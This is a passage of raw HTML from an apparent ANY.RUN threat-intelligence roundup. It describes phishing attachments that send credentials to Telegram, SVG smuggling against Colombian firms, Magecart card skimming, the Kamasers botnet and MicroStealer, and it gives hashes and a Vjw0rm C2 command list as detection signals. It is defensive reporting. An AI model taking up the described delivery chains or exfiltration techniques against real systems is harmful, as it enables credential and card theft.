target=\"_blank\">\nSign up now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>To explore related activity, review relevant sandbox analyses and assess the broader threat landscape, use the following&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#%7B%2522query%2522:%2522registryName:%255C%2522%5Erutsdll32$%255C%2522%2522,%2522dateRange%2522:180%7D\" target=\"_blank\" rel=\"noreferrer noopener\">registryName:&#8221;^rutsdll32$&#8221;<\/a>&nbsp;<\/p>\n\n\n\n<p><strong>Gathered IOCs:<\/strong>&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>57ce6187be65c1c692a309c08457290ae74a0047304de6805dbb4feb89c0d7e5&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>6a581c3b6fe7847bb327f5d76e05653a1504e51023454c41835e5dc48bc13ba4&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>7d157366d74312965912a35cbba4187532cfeb3b803119a3a04c9ba0ba7d4ab0&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>07f56ac8b5bd7cdb4c33ea5e9cd42bc7f9d3cd5504aabbb476ef010a142d7e29&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>a6f72590792b3f26271736e5a7ba80102292546bb118cf84ff29df99341abfbe&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">4. Fake PDF Attachments Hide HTML Phishing Pages That Steal Credentials&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7437492983123529728\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;identified&nbsp;phishing emails carrying&nbsp;<strong>HTM\/HTML attachments disguised as PDF files<\/strong>. In the observed case, a file named&nbsp;<strong>pdf.htm<\/strong>&nbsp;opened a fake login page and sent&nbsp;submitted&nbsp;credentials in JSON format through an HTTP POST request to the&nbsp;<strong>Telegram Bot API<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-768x1024.jpeg\" alt=\"Attack details discovered by ANY.RUN\" class=\"wp-image-19730\" style=\"width:520px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HDIlLHIWkAAtM9u-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>Attack details discovered by ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The attack relies on a simple but effective disguise: the attachment looks like a document but actually launches a phishing page designed to collect login data. Some samples also include obfuscated scripts, which makes the credential theft logic less obvious during manual inspection and slows down triage.<\/p>\n\n\n\n<p>Once a victim enters their credentials, attackers can use them to access business email, internal services, and other corporate systems tied to the compromised account. For security teams, this turns what may&nbsp;look&nbsp;like a routine attachment into a fast-moving account takeover risk.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/3a6af151-cf57-461f-b600-19c39fdfcce6?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"222\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-1024x222.png\" alt=\"Less than 1 minute\u00a0required\u00a0to reveal the phishing\u00a0behavior\u00a0inside ANY.RUN sandbox\" class=\"wp-image-19731\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-1024x222.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-300x65.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-768x166.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-370x80.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-270x58.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49-740x160.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-22.15.49.png 1192w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Less than 1 minute&nbsp;required&nbsp;to reveal the phishing&nbsp;behavior&nbsp;inside ANY.RUN sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, the phishing&nbsp;behavior&nbsp;became visible in under 60 seconds, exposing the outbound communication, loaded scripts, and file contents involved in the theft flow. This helps teams quickly confirm whether an attachment is just suspicious or part of an active credential-harvesting attack, reducing review time and helping analysts act before the stolen access is used.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">5. SVG Smuggling Campaign Targets Colombian Organizations&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7441841298115989505\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;observed&nbsp;a phishing campaign targeting organizations in&nbsp;<strong>Colombia<\/strong>, particularly in&nbsp;<strong>government, finance, oil and gas, and healthcare<\/strong>. The attackers use Spanish-language phishing emails with an attached&nbsp;<strong>SVG file<\/strong>&nbsp;that acts as more than an image: it&nbsp;contains&nbsp;embedded JavaScript that rebuilds the next attack stage locally through&nbsp;<strong>SVG smuggling<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1024x538.jpeg\" alt=\"SVG smuggling campaign details revealed by ANY.RUN\" class=\"wp-image-19732\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1024x538.jpeg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-300x158.jpeg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-768x403.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-1536x806.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-2048x1075.jpeg 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-370x194.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-270x142.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEGX8rXWMAEcy9z-740x389.jpeg 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>SVG smuggling campaign details revealed by ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of downloading a payload from an external source right away, the SVG uses a&nbsp;<strong>blob URL<\/strong>&nbsp;to generate an intermediate HTML lure inside the browser. That lure imitates a document-related workflow and creates a&nbsp;<strong>password-protected ZIP archive<\/strong>&nbsp;for the victim to open, pushing the attack forward while reducing obvious early network&nbsp;signals.&nbsp;<\/p>\n\n\n\n<p>This staged delivery makes the campaign harder to catch during&nbsp;initial&nbsp;triage. SVG smuggling, blob-generated content, and the later use of legitimate Windows components break the compromise into smaller artifacts that may&nbsp;look&nbsp;weak or unrelated on their own, slowing detection and investigation.&nbsp;<\/p>\n\n\n\n<p>Inside ANY.RUN Sandbox, analysts were able to reconstruct the full flow:&nbsp;<\/p>\n\n\n\n<p><strong>SVG smuggling \u2192 Blob-based HTML lure \u2192 Password-protected ZIP \u2192&nbsp;Notificacion&nbsp;Fiscal.js \u2192 radicado.hta \u2192 J0Ogv7Hf.ps1 \u2192 C2 communication<\/strong>&nbsp;<\/p>\n\n\n\n<p>That visibility helps security teams connect scattered artifacts faster, uncover hidden delivery stages, and confirm malicious activity before the intrusion progresses further.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch hidden delivery chains before they lead to compromise\n<br> Give your team <span class=\"highlight\">earlier visibility<\/span> into multi-stage attacks\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>You can use the following Vjw0rm C2 response commands as detection&nbsp;signals to detect active compromise in your environment:&nbsp;&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cl \u2014 execution termination&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AW \u2014 active window data collection and exfiltration&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ex \u2014 PowerShell code execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SF \/ RF \u2014 base64 payload delivery, storage, and execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DL \u2014 file download from URL with optional execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DLF \u2014 file delivery via C2 with storage and execution&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Un \u2014 removal of persistence mechanisms and related artifacts&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">6. Active&nbsp;Magecart&nbsp;Campaign Hijacks&nbsp;eStores&nbsp;and Steals Card Data&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/banks-magecart-campaign\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed breakdown<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts uncovered an active&nbsp;<strong>Magecart&nbsp;campaign<\/strong>&nbsp;targeting e-commerce websites, with a notable concentration in&nbsp;<strong>Spain<\/strong>. In the observed cases, attackers hijacked checkout flows, replaced legitimate payment steps with fake interfaces, and stole card data through&nbsp;<strong>WebSocket-based exfiltration<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1024x1024.png\" alt=\"WebSocket exfiltration code\" class=\"wp-image-19733\" style=\"width:543px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1024x1024.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-300x300.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-150x150.png 150w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-768x768.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-1536x1536.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-70x70.png 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-370x370.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-270x270.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1-740x740.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2e-1-2048x2048-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>WebSocket exfiltration code<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>What makes this campaign especially dangerous is its durability. The operation remained active for more than&nbsp;<strong>24 months&nbsp;<\/strong>and&nbsp;relied on a large infrastructure of&nbsp;<strong>100+ domains<\/strong>, using staged payload delivery, fallback domains, and payment-page mimicry to stay operational and avoid disruption. In Spain-focused cases, the attackers notably abused&nbsp;<strong>Redsys-themed&nbsp;<\/strong>payment context to make the fraudulent flow appear legitimate.&nbsp;<\/p>\n\n\n\n<p>The campaign also stood out for how it blended card theft into trusted payment experiences. Instead of relying on a simple fake form, the malware dynamically adapted the checkout page, injected malicious elements, and transmitted stolen payment data outside normal HTTP flows, making detection harder for defenders and increasing fraud risk for banks and payment ecosystems.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/7e66942b-82f5-4dc7-9be3-b73ac0600fb1\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the full payment-skimming chain<\/a>&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"569\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1024x569.png\" alt=\"PayPlug\u00a0SAS payment window imitation displayed inside ANY.RUN sandbox\u00a0\" class=\"wp-image-19734\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1024x569.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-300x167.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-768x427.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-1536x853.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-2048x1138.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-370x206.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-270x150.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.53.02-740x411.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>PayPlug&nbsp;SAS payment window imitation displayed inside ANY.RUN sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, analysts exposed the multi-stage delivery logic, malicious script injection, fake payment overlays, and WebSocket-based card data exfiltration. This helps security teams understand how the skimmer&nbsp;operates,&nbsp;identify&nbsp;related infrastructure faster, and strengthen detections against long-running payment theft campaigns.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">7.&nbsp;Kamasers: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed analysis<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN published a detailed technical analysis of&nbsp;<strong>Kamasers<\/strong>, a multi-vector&nbsp;<strong>DDoS botnet<\/strong>&nbsp;designed to carry out both application-layer and transport-layer attacks while also supporting follow-on payload delivery. The research shows how the malware&nbsp;operates, how it receives commands, and why it creates risk beyond disruption alone.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/232034c5-de22-4eb4-a3ab-62e58d041205?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See&nbsp;Kamasers&nbsp;behavior&nbsp;exposed<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"901\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-1024x901.png\" alt=\"Communication between the infected host and the C2 server\u00a0observed\u00a0inside ANY.RUN\" class=\"wp-image-19736\" style=\"width:470px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-1024x901.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-300x264.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-768x676.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-370x326.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-270x238.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2-740x651.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-2.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Communication between the infected host and the C2 server&nbsp;observed&nbsp;inside ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside the sandbox, analysts&nbsp;observed&nbsp;the botnet retrieving command-and-control data, communicating with active infrastructure, executing DDoS-related commands, and in some cases downloading&nbsp;additional&nbsp;files for execution. This helps security teams confirm malicious&nbsp;behavior&nbsp;faster and understand whether an infected host is being used only for flooding activity or as part of a broader compromise.&nbsp;<\/p>\n\n\n\n<p>Kamasers&nbsp;supports multiple attack methods, including&nbsp;<strong>HTTP, TLS, UDP, TCP, and&nbsp;GraphQL-based flooding<\/strong>. In addition, it can act as a&nbsp;<strong>loader<\/strong>, which increases the risk of further malware delivery, data theft, or ransomware.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\"><span class=\"highlight\"> Reduce <\/span>the chance of data theft and financial loss\n<br> Help your team\u00a0<span class=\"highlight\">contain\u00a0threats<\/span> before the damage grows\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>Another notable finding was the botnet\u2019s resilient&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;design. Instead of depending on a single static C2 location,&nbsp;Kamasers&nbsp;uses legitimate public services such as&nbsp;<strong>GitHub Gist, Telegram, Dropbox, Bitbucket, and&nbsp;Etherscan&nbsp;<\/strong>to retrieve active command-and-control addresses, making disruption and early detection more difficult.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"198\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10.png\" alt=\"DDR links in the\u00a0Kamasers\u00a0codebase\" class=\"wp-image-19737\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-300x66.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-768x169.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-370x81.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-270x59.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image10-740x163.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>DDR links in the&nbsp;Kamasers&nbsp;codebase<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>For organizations, that means a single infected system can become both a source of external attacks and a foothold for deeper intrusion, increasing operational, financial, and reputational risk.&nbsp;<\/p>\n\n\n\n<p>To review related sandbox analyses and broader activity, use the following&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1024x446.png\" alt=\"Kamasers\u00a0attacks displayed inside TI\u00a0Lookup\" class=\"wp-image-19738\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1024x446.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-768x335.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1-740x322.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-24-at-19.16.58-2048x892-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside TI&nbsp;Lookup<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">8.&nbsp;MicroStealer: A Fast-Spreading Infostealer with Limited Detection&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check technical analysis<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts found&nbsp;<strong>MicroStealer<\/strong>, a fast-spreading infostealer that gained traction despite limited public detection. In observed activity, the malware appeared in&nbsp;<strong>40+ sandbox sessions in less than a month<\/strong>, using a multi-stage chain to steal credentials, session data, screenshots, and wallet files.&nbsp;<\/p>\n\n\n\n<p><a 